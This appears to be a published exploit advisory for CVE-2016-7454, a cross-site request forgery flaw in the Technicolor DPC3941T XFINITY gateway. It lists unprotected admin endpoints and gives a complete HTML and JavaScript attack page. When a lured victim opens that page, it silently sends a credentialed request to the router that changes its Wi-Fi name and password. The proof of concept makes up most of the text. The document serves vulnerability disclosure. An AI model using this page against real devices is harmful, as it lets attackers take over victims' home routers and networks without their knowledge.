# Exploit Title: CSRF XFINITY Gateway product Technicolor(previously Cisco) DPC3941T # Date: 12/12/2016 # Exploit Author: Ayushman Dutta # Version: dpc3941-P20-18-v303r20421733-160413a-CMCST # CVE : CVE-2016-7454 The Device DPC3941T is vulnerable to CSRF and has no security on the entire admin panel for it. Some of the links are at: <IP Address>/actionHandler/ajax_remote_management.php <IP Address>/actionHandler/ajaxSet_wireless_network_configuration_edit.php <IP Address>/actionHandler/ajax_network_diagnostic_tools.php <IP Address>/actionHandler/ajax_at_a_glance.php A simple HTML page with javascript on which the attacker lures the victim can be used to change state in the application. <html> <head> <title> Lets CSRF Xfinity to change Wifi Password </title> </head> <script> function jsonreq() { var json_upload = "configInfo=" + JSON.stringify({"radio_enable":"true", "network_name":"MyName", "wireless_mode":"a,n,ac", "security":"WPAWPA2_PSK_TKIPAES", "channel_automatic":"true", "channel_number":"40", "network_password":"password", "broadcastSSID":"true", "enableWMM":"true", "ssid_number":"1"}); var xmlhttp = new XMLHttpRequest(); xmlhttp.withCredentials = true; xmlhttp.open("POST","http://10.0.0.1/actionHandler/ajaxSet_wireless_network_ configuration_edit.php", true); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form- urlencoded"); xmlhttp.send(json_upload); } jsonreq(); </script> </html>